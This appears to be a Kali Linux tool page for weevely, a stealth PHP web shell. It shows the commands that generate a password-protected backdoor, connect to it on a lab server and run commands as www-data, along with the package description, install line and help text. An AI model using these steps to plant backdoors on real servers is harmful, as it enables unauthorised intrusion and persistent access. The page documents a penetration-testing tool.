weevely Usage Example

Generate a PHP backdoor (generate) protected with the given password (s3cr3t).

root@kali:~# weevely generate s3cr3t
[generate.php] Backdoor file 'weevely.php' created with password 's3cr3t'
root@kali:~# weevely http://192.168.1.202/weevely.php s3cr3t
      ________                     __
     |  |  |  |----.----.-.--.----'  |--.--.
     |  |  |  | -__| -__| |  | -__|  |  |  |
     |________|____|____|___/|____|__|___  | v1.1
                                     |_____|
              Stealth tiny web shell

[+] Browse filesystem, execute commands or list available modules with ':help'
[+] Current session: 'sessions/192.168.1.202/weevely.session'

www-data@kali:/var/www $ uname
Linux
www-data@kali:/var/www $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Packages and Binaries:

weevely

Weevely is a stealth PHP web shell that simulate telnet-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones.

Installed size: 890 KB
How to install: sudo apt install weevely

  • python3
  • python3-dateutil
  • python3-mako
  • python3-prettytable
  • python3-socks
  • python3-yaml
weevely

Weaponized web shell

root@kali:~# weevely -h
usage: weevely [-h] {terminal,session,generate} ...

positional arguments:
  {terminal,session,generate}
    terminal            Run terminal or command on the target
    session             Recover an existing session
    generate            Generate new agent

optional arguments:
  -h, --help            show this help message and exit

Updated on: 2021-Nov-26